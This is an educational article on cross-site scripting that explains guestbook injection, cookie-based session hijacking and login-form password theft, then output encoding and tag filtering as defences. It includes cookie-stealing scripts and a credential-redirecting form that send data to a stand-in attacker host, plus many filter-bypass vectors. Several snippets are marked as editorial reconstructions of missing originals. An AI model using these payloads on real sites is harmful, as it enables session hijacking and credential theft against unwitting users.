::: What is Cross Site Scripting (XSS)? :::
XSS is simply tricking a web server into presenting malicious HTML to the user. Usually the intent is to steal session information.
Scripts may also be used to change the contents of web pages in order to display false information to the visitor, or to redirect forms so that secret data are posted to the attacker's computer. XSS generally attacks the user of the web application, not the application itself. The attacks are possible when the web application lacks proper output filtering. We will look into that further down this article.
::: Some Example Exploits :::
Let's begin with a simple example. We'll use the old school web site 'Guestbook' as our example here. In our imaginary guestbook, the user can enter anything they want, and that text is then appended to what was there before. Remember when guestbooks worked like this? Some still do (actually, MANY still do!).
Let's say our villain enters the following:
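The original input is missing from this copy of the article. Judging from the discussion below, it was a greeting ending in an unterminated HTML comment marker; the exact text before the marker doesn't matter, so something like:

```html
Nice guestbook! <!--
```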

What happens? Well, nothing seems to happen at first, but once his text is mixed in with the other greetings, the web application will pass this to visitors reading the guestbook:
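The resulting page is also missing here. Mixed in with the other entries, it would have looked roughly like this (the surrounding entry markup is hypothetical):

```html
<p>Bob: Greetings from Norway!</p>
<p>Villain: Nice guestbook! <!--</p>
<p>Alice: Lovely site, keep it up!</p>
```

Everything after the villain's unterminated comment marker vanishes from view.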

Now look: the villain's output appears to be part of the HTML code. Standards-compliant browsers treat <!-- as a start-of-comment marker, and as they never find a matching end-of-comment marker, most of them hide all text below the villain's entry. Not a particularly high-grade attack, but annoying anyway. What would have happened if the attacker instead had entered something like this:
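Again the original snippet is missing; a script with the effect described below could look like this (the URL is a placeholder):

```html
<script>
for (var i = 0; i < 10000; i++) {
    window.open('http://some-embarrassing-site.example/');
}
</script>
```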

This time, when the guestbook is displayed, the page will attempt to open 10,000 windows, potentially full of porn or other embarrassing material.
Now let's look at an example discussion site that our kids may use. The site lacks output filtering and is susceptible to XSS attacks. So our villain enters the following in his message:
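The snippet is missing from this copy; it would simply have been an image tag pointing at the attacker's own server (the host name is a placeholder):

```html
<img src="http://attacker.example/offensive-picture.jpg"/>
```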

If the image is displayed in the browsers of all the kids, the site will surely make the headlines somewhere. And for certain kinds of images, the police may even come knocking on the doors of the unknowing persons running the site. That would suck if you were that person.
Clearly something needs to be done. But before we look at how to prevent this, let's look at some more serious examples.
::: Session Hijacking :::
As cookies are available to a script, Cross-site Scripting may be used to hijack cookie-based sessions. If a bad guy gets access to someone else's session cookie, he may often appear as that someone to the server by installing the cookie in his own browser.
When people hear about XSS-based session hijacking for the first time, they sometimes have a hard time understanding how the process works (like my ex-boss, for example). It's important to understand in what context the session ID cookie is available to the attacker's script. As you know, a victim who logs into a site gets a unique session ID cookie assigned to him. The attacker wants that cookie in order to impersonate the victim. And he can't get it by simply tricking the victim into visiting the attacker's own web server: as the domain names do not match, the victim's browser will not send the cookie there. So, how does the attacker get to the cookie? Maybe this graphic will help you.
Simplest possible Session Hijacking example
(clip art courtesy of Vinson Media, thanks Vinny)
The wanted cookie exists only in communication between the victim and the target web server (associated with step 2 in my figure above). For a script to successfully access this cookie, it will have to be included in pages sent from the web server directly to the victim's browser. Let's say the web server in question hosts a discussion application that is vulnerable to XSS because it allows scripts in notes entered by the users (again, you would think there are no more of these, but oh, there are plenty. Google "sign my guestbook" and search a bit - you will find TONS of sites that are XSS vulnerable).
Anyways, back to our discussion application.
The attacker first joins a discussion, entering a note that contains some cookie-stealing JavaScript (step 1 in the figure). The web server stores the note in its internal database. Later, another user, the victim, logs in to the discussion site. Upon logging in, he receives his personal session ID from the web server. When the user asks to read the attacker's note, the web server builds a web page containing the note text, including the malicious script. This page is then passed to the victim (step 2).
As part of displaying the web page, the victim's browser will also run the script. The script picks up the cookie that is associated with the web page, meaning the cookie containing the session ID, and immediately passes the cookie to the attacker's computer (step 3). After receiving the cookie, the attacker installs it in his own browser, and visits the discussion web server (step 4). The web server receives the stolen session ID from the attacker, and thinks it is talking to the victim. The attacker now fully impersonates the victim on the discussion site. He may post notes in the name of the victim, block him from the site by changing his password, and in some cases even get access to the password of the victim, paving the way to other sites on which the victim uses the same password. See all the havoc that can be caused? Ugh...
Now I will fill in some details for you.
The malicious script makes the browser of the victim pass the cookie to the computer owned by the attacker. Passing the cookie is most easily done using a script that redirects the browser to a web server running on the attacker's computer, taking the cookie with it on the journey. A JavaScript that gives the cookie to the attacker's web server may look like this:
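The script listing is missing from this copy; based on the description that follows, it would have looked something like this (attacker.example stands in for the attacker's host):

```html
<script>
document.location.replace(
    'http://attacker.example/steal.php?what=' + document.cookie);
</script>
```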

The above script uses document.location.replace to instruct the user's browser to immediately visit another URL, namely steal.php on the attacker's web server. steal.php is a small web application that accepts a what parameter, which the above JavaScript carefully fills in. The what parameter describes what steal.php is supposed to steal. The JavaScript running in the victim's browser assigns the built-in variable document.cookie to this parameter. document.cookie is a JavaScript variable that contains any cookies associated with the connection between the browser executing the script and the server providing the web page. what will thus contain the session ID cookie if such a thing is present.
Obviously the victim will quickly realize that something is going on, as both the URL and the contents of the web page suddenly change. His browser no longer visits the intended web site, but rather that of the attacker. To hide the theft, the attacker's web server may generate a response containing a new redirect that immediately sends the browser back to the original site. If steal.php is supposed to be generic, the attacker may extend it to accept a second parameter called whatnext, a URL that dictates where the second redirect should go. The extended cookie-stealing JavaScript may look somewhat like this:
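This listing is also missing; reconstructed from the description below (both host names are placeholders), it would look something like this:

```html
<script>
if (document.cookie.indexOf('stolen=') == -1) {
    var loot = document.cookie;
    // Mark this browser so the initial redirect happens only once,
    // avoiding a redirection loop.
    document.cookie = 'stolen=yes';
    document.location.replace(
        'http://attacker.example/steal.php?what=' + loot
        + '&whatnext=http://www.good.site/discussion/');
}
</script>
```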

This time, steal.php accepts two parameters, the what that we have seen before, and the new whatnext which is supposed to contain a URL. The URL given by whatnext is used by steal.php to create a new web page containing another JavaScript that immediately instructs the browser to jump back to the good site. Note the use of an additional cookie named stolen. If this cookie is present, the script will do nothing. Otherwise, the script will add the new stolen cookie. The cookie is added to avoid redirection loops. If the victim is redirected back to the page containing the attacker's script, the script will run again, and redirect a second time to the attacker's server, which in turn redirects back, and so on. With the additional cookie, the initial redirect happens only once. In cases where the attacking script is not stored on the target web server, the loop avoidance code is not needed.
Based on the above script, steal.php would respond with a new web page containing nothing more than this little redirection code:
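The redirection code is missing here; it would simply echo the whatnext URL back in a new script (the URL below matches the hypothetical good site used above):

```html
<script>
document.location.replace('http://www.good.site/discussion/');
</script>
```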

After giving this redirection to the browser, steal.php will notify the attacker that a new secret has been stolen, maybe by sending him an E-mail. If the attacker is a little bit cunning, he may even program steal.php to exploit the user and the target web site automatically.
Let's sum it all up by this step-by-step overview on XSS-based session hijacking that includes the above "stealth" method:
1. The attacker somehow makes the good site, on which the victim has a session, include a cookie-stealing JavaScript in a page presented to the victim.
2. The victim's browser receives the script from the good site and executes it. The script immediately redirects the browser to the web server of the bad guy, taking the session ID cookie with it as part of the URL.
3. Upon receiving the request, the bad guy's stealing application extracts the cookie from the URL, and generates a reply page containing another redirection script pointing back to the good site.
4. The victim's browser receives the new web page from the attacker's server. It then runs the new redirection script, which asks it to fetch a new page from the good server.
5. The attacker inserts the stolen cookie in his own browser, and connects to the good site. The good site will mistake him for the victim.
The user may see a short flicker, but he will otherwise not be able to tell that his browser paid a quick visit to the attacker's web server. Not even the browser's history will be able to tell the tale, as document.location.replace overwrites the current history entry with the new URL.
::: Stealing Passwords :::
Many log-in scripts redisplay the user name if log-in fails. They generate a new log-in form in which the previously entered user name is filled in, in the belief that it was the password that was entered incorrectly. Quite user friendly, and not at all a bad thing to do. Unless you're vulnerable to XSS.
A system for small payments, created by a large, multinational consulting company in cooperation with a couple of banks, did just that. I read about it about a year and a half ago. And as they did not forbid scripts in the user name, they made it possible to steal other users' passwords via XSS.
The original ASP/VBScript code to redisplay the log-in form after a failed log-in attempt probably looked like this:
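The code listing is missing from this copy of the article. A typical version, with hypothetical form and field names, might have looked like this:

```asp
<form method="post" action="login.asp">
  User name: <input type="text" name="username"
                    value="<%= Request.Form("username") %>"/>
  Password: <input type="password" name="password"/>
  <input type="submit" value="Log in"/>
</form>
```

Note how the submitted user name is echoed straight back into the value attribute.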

If you are an ASP programmer, this should look VERY familiar to you.
You may see that the value attribute of the username input field is set to reflect the user name given in the failed log-in. Unfortunately, this user name is filled in with no handling of metacharacters, making it possible for an attacker to create a separate web page that looks like this:
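The attacker's page is missing from this copy. Reconstructed from the description below (host names and the grab.php script are placeholders), it would be an auto-submitting form along these lines:

```html
<html><body>
<form name="evil" method="post"
      action="https://payment.example/login.asp">
  <input type="hidden" name="username"
         value='"/><script>document.forms[0].action=
"http://attacker.example/grab.php";</script>'/>
  <input type="hidden" name="password" value="wrong-on-purpose"/>
</form>
<script>document.evil.submit();</script>
</body></html>
```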

The page contains an auto-posting form that sends an invalid log-in attempt to the payment site. If you look carefully, you see that the value attribute uses single quotes rather than double quotes to encapsulate the value that makes up the malicious script. HTML allows either single or double quotes. The use of single quotes makes it possible to have double quotes as part of the value. And the double quotes play a major role in this scam: when included in the original log-in form, those double quotes terminate the value attribute of the original input field for the user name. The attacker's log-in attempt, provoked by the above form, gives a user name that looks like this:
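The user name itself is missing above; under the same placeholder names, the submitted value would be:

```html
"/><script>document.forms[0].action="http://attacker.example/grab.php";</script>
```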

When the payment site creates its response page to the invalid log-in, it includes the script code supplied by the attacker (I added spaces for readability):
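The excerpt is missing from this copy; the relevant part of the response page would look roughly like this, where the trailing "/> is the leftover tail of the original value attribute:

```html
<input type="text" name="username" value="" />
<script>
document.forms[0].action = "http://attacker.example/grab.php";
</script>
"/>
```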

Once included in the real log-in page, the script replaces the action attribute of the form so that it posts the user name and password to the attacker's server rather than to the payment site's server.
If the attacker tricks the victim into viewing the first form, and from there to attempt to log-in to the payment site, the attacker gains the user name and the password of the victim.
A side note. Platforms that automatically escape quotes in incoming data, as PHP does with magic_quotes_gpc enabled, will make it hard to include JavaScript string constants in incoming data. An attacker may, however, create strings without using quotes, with the help of the fromCharCode method of the JavaScript String object. The method takes a list of character codes, and returns the string built by concatenating the matching characters. As an example, the string constant "ABC" may be replaced with the following, in order to bypass quote filtering:
String.fromCharCode(65,66,67)
The three numbers are the ASCII values of the characters "A", "B" and "C."
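As a quick sanity check, the two forms really do produce the same string:

```javascript
// The quoted constant and the quote-free construction are identical.
var quoted = "ABC";
var unquoted = String.fromCharCode(65, 66, 67);
console.log(unquoted === quoted); // prints true
```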
::: The Solution :::
The solution is easy! FILTER YOUR OUTPUT.
With HTML encoding, one maps certain HTML metacharacters to their character entity equivalents. The mapping is done according to the following, simple algorithm:
1. Map every occurrence of & (ampersand) to &amp;
2. Then replace every " (double quote) with &quot;
3. Then every < (less than) with &lt;
4. And finally replace every > (greater than) with &gt;
5. If the application uses single quotes to encapsulate tag attributes, you may need to replace the single quote character with &#39; too.
Chances are that you need not implement this algorithm yourself. Several web programming languages already provide a function for doing the mapping, such as the htmlspecialchars of PHP, and Server.HTMLEncode of ASP/VBScript. Before using one of these built-in functions, you should make sure they actually encode all four characters given above, and also the single quote if you need it.
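If you do have to roll your own, a minimal sketch of the algorithm in JavaScript could look like this (the function name is mine):

```javascript
// Minimal HTML encoder. Order matters: ampersands must be mapped
// first, or the other replacements would get double-encoded.
function htmlEncode(s) {
    return s
        .replace(/&/g, '&amp;')
        .replace(/"/g, '&quot;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/'/g, '&#39;'); // only needed for single-quoted attributes
}

console.log(htmlEncode('2<3')); // prints "2&lt;3"
```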
The implication of doing HTML encoding is that the browser will display data exactly as they were written. Imagine, for instance, a forum for osix mathematicians. When someone enters a note containing 2<3, the browser will run into problems unless it is given the HTML encoded version: 2&lt;3. When given HTML character entities rather than, for instance, less than and greater than characters, the browser will not interpret the entities as tag markers. Anything an attacker (or an osix mathematician) writes will thus be visible in the browser window, rather than being interpreted as markup by the browser. Just something to keep in mind.
::: Tag Filtering (selective) :::
HTML encoding of everything isn't possible in all applications. Take web publishing systems, for instance. The publisher will want to include some markup in order to make paragraphs and headings, to include images and links, and so on. In some publishing systems it may be OK to give the publisher full control, while other systems will have to restrict his actions. Like when the "publisher" is one of thousands of users entering notes in a discussion forum. Similarly for web-based E-mail programs. One will likely want to allow HTML formatted E-mails, without letting those E-mails contain scripts and other potentially harmful code.
So, how do you allow innocent markup while rejecting the bad? Before looking at methods in more detail, let's see how hard it may be to avoid malicious HTML content if we want to allow some markup.
A former ISP of mine offered its customers access to their mailbox through a web based E-mail program, similar to Hotmail. Since they allowed HTML formatted E-mails, they couldn't use plain HTML encoding when displaying the contents of the mails. Instead they had to do some filtering. As always, I was curious: I wanted to check whether they successfully removed scripts from mails before the mails were displayed in users' browsers. So I sent myself some E-mails, and found that they were actually quite good at filtering. Except for one thing: if my E-mail contained the following code, I was able to have a script run in the receiver's browser:
<body onload="alert('gotcha')">
They had forgotten about the onload attribute of the body tag, and my browser gave me a nice little alert box with "gotcha" in it as I read the mail. Next test: one of my friends happened to be a customer of the same ISP, and he agreed to help me out. I sent him an E-mail with that body tag in it, but this time the alert statement was replaced by a session-stealing script like the one I talked about above. As soon as he read my mail, I received his session cookie. I immediately updated my Netscape Navigator's cookies file to include the cookie, and told Navigator to visit the ISP's web mail site. This time I didn't see my own mailbox. Instead, the E-mail application thought I was my friend, and I was able to read his E-mails and send new mails from his account. And it all worked even though HTTPS was used by both my friend and me. True story, no shit.
Similar problems have been found in several on-line E-mail services, including even Hotmail, and in popular discussion applications. In 2002, XSS-related vulnerabilities were reported almost daily to international security mailing lists. Still are today.
Allowing some markup but not all is hard, because there are so many ways to insert scripts in an HTML document other than using the obvious script tag. What follows are a few examples on how scripts may be included. Some examples contain the word ANY as part of the tag or of an attribute: ANY may be replaced by any tag or attribute name, even illegal ones, and the script inclusion will still work.
For starters, you have that well-known script tag that is understood by any browser supporting client-side scripting:
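The example is missing from this copy; the plain form is simply:

```html
<script>alert('script');</script>
```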

Then, with the venerable Netscape Navigator, you can even use style tags to enclose a script:
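This example is missing too; it presumably used Navigator's JavaScript style sheet support, something like:

```html
<style type="text/javascript">alert('script');</style>
```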

In 2001, some kid showed that the popular Hotmail service was vulnerable to the latter style-tag attack, simply by sending Hotmail users an E-mail containing such a tag.
And if you happen to come across a Microsoft Internet Explorer, you may include a script with any tag, as long as you're able to add a style attribute:
<ANY style="ANY: expression(alert('script'))"/>
To make things harder, both Navigator and Internet Explorer support JavaScript URLs as well:
<img src="javascript:alert('script');"/>
OK, so we need to look at the attribute values too, not just the tags. The simple approach would be to filter out any occurrence of javascript: that one would find as part of a URL. Unfortunately, that would not be enough. Those forgiving browsers, for reasons unknown, let you break the javascript keyword with white space, and they still run the script:
<img src="java
script:alert('script');"/>
Oh well, then we'll have to filter based on white space too. But wait, there's more. The browsers are really forgiving: they even let you represent the white space using HTML character entities, and they still parse the string as a JavaScript URL:
<img src="java&#10;script:alert('script');"/>
By the way, Navigator is not the only browser to support encapsulation of scripts in style tags as seen above. With those helpful JavaScript URLs, Internet Explorer is vulnerable too:
<style type="text/css">
@import url(javascript:alert('script'));</style>
Unfortunately, browsers do not care whether the HTML document is well-formed. You may include, for example, body tags anywhere, including inside the document body. And as seen above, body tags accept an onload attribute that may contain a script. The lightweight, fast, and standards-compliant Opera, the open-source and standards-compliant Mozilla, the age-old but still not-quite-dead Netscape Navigator, and the often-used Internet Explorer all execute a script when they encounter the following tag anywhere inside a document:
<body onload="alert('script')">
And then, of course, you have onclick, ondblclick, onmousedown, onkeypress and all the other on attributes that may be added to most tags.
And as if all the above wasn't enough, old (before version 5) Netscape Navigators support what has been called JavaScript entities:
<ANY ANY="&{alert('script');};"/>
Anything between &{ and }; in a tag attribute will be interpreted as a script. A very good reason why the & character should be transformed into its HTML character entity representation too.
There are probably many more ways to insert scripts in all the browsers out there. If you want to allow some markup, beware that avoiding scripting may be very hard.
Let's see what to do when we want to keep the good tags while getting rid of the bad. We will need to parse the HTML much like the browser does to find the tags. If we find a tag we don't like, we have several possible approaches on how to handle it, depending on the application:
1. We could HTML encode the entire tag. The result would be that the end user would see what tag someone had written, without having the tag interpreted by the browser. This may be a good alternative when we know that no bad tags should be present at all, for instance when writing a web-based E-mail application.
2. We could remove the entire tag. In that case it is probably a good idea to repeat the washing process until no more changes are done, otherwise we risk that <scr<script>ipt> becomes <script>, for example. Removing things in a single iteration may be dangerous.
3. We could rename the tag so that <script> becomes <disabled-script>, for instance. The latter is not understood by the browsers, so it will be ignored. It is still possible to spot the unwanted tag by taking a look at the HTML source.
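The single-pass pitfall in the removal approach can be sketched like this (a toy filter for illustration, not a real sanitizer):

```javascript
// Toy filter: strips <script> and </script> tags in one pass.
function stripOnce(s) {
    return s.replace(/<\/?script[^>]*>/gi, '');
}

// Repeat until nothing changes, so tags that reassemble after a
// removal get caught on the next pass.
function stripRepeated(s) {
    var previous;
    do {
        previous = s;
        s = stripOnce(s);
    } while (s !== previous);
    return s;
}

console.log(stripOnce('<scr<script>ipt>alert(1)</scr</script>ipt>'));
// a single pass leaves '<script>alert(1)</script>' behind
```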
So much for the bad tags. But what about the good ones? The ones we want to keep? It could be tempting to just include them directly, but after seeing all the examples above, we probably know that even good tags may carry malicious attributes. So here we go again. For each good tag, we need to parse the attributes to separate the good from the bad. The onclick attribute and friends, for instance, should always be considered bad if we want to avoid scripts. Bad attributes could be removed, or they could be renamed to something harmless.
But what about the good attributes? Could we just include them? Nope! We need an additional step. If we want to allow the img tag, we clearly want to allow the src attribute, as it specifies the URL of the image. But as you have seen above, URLs are not always good, for instance when the scheme is javascript rather than http, ftp, file or something similar. And for Netscape Navigator, any attribute may be bad if the value contains &{...};. So, for good attributes, we even need to analyze the value. And that analysis must cope with HTML character entities, to treat javascript: and j&#97;vascript:, for example, as the same (97 is the decimal ASCII value of the lower case character 'a'). In addition, the values must be considered depending on the context: javascript: is no problem in the value attribute of an input tag of type text, but it may be troublesome in the src attribute of an input tag of type image. This takes quite some focus - a lot of focus, actually - and a clear understanding of how different tags and attributes are handled by the browsers.
We've been talking about good and bad tags, attributes, and attribute values. How do we decide what is good and what is bad? Let's look at some pseudocode:
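The author's pseudocode is missing from this copy. In the spirit of the discussion above, the decision is whitelist-driven: anything not explicitly allowed is bad. A sketch in JavaScript, with a hypothetical (and deliberately tiny) whitelist:

```javascript
// Hypothetical whitelist: allowed tags, and per tag, allowed attributes.
var allowedTags = {
    'p': [], 'b': [], 'i': [],
    'a': ['href'],
    'img': ['src', 'alt']
};

function isGoodAttribute(tag, name, value) {
    var allowed = allowedTags[tag];
    if (!allowed || allowed.indexOf(name) < 0) return false;
    // URL-valued attributes need their scheme checked too (after
    // decoding HTML character entities, which is not shown here).
    if (name === 'href' || name === 'src') {
        return /^(https?|ftp):/i.test(value);
    }
    return true;
}

console.log(isGoodAttribute('img', 'src', 'javascript:alert(1)')); // false
console.log(isGoodAttribute('a', 'href', 'http://example.com/'));  // true
```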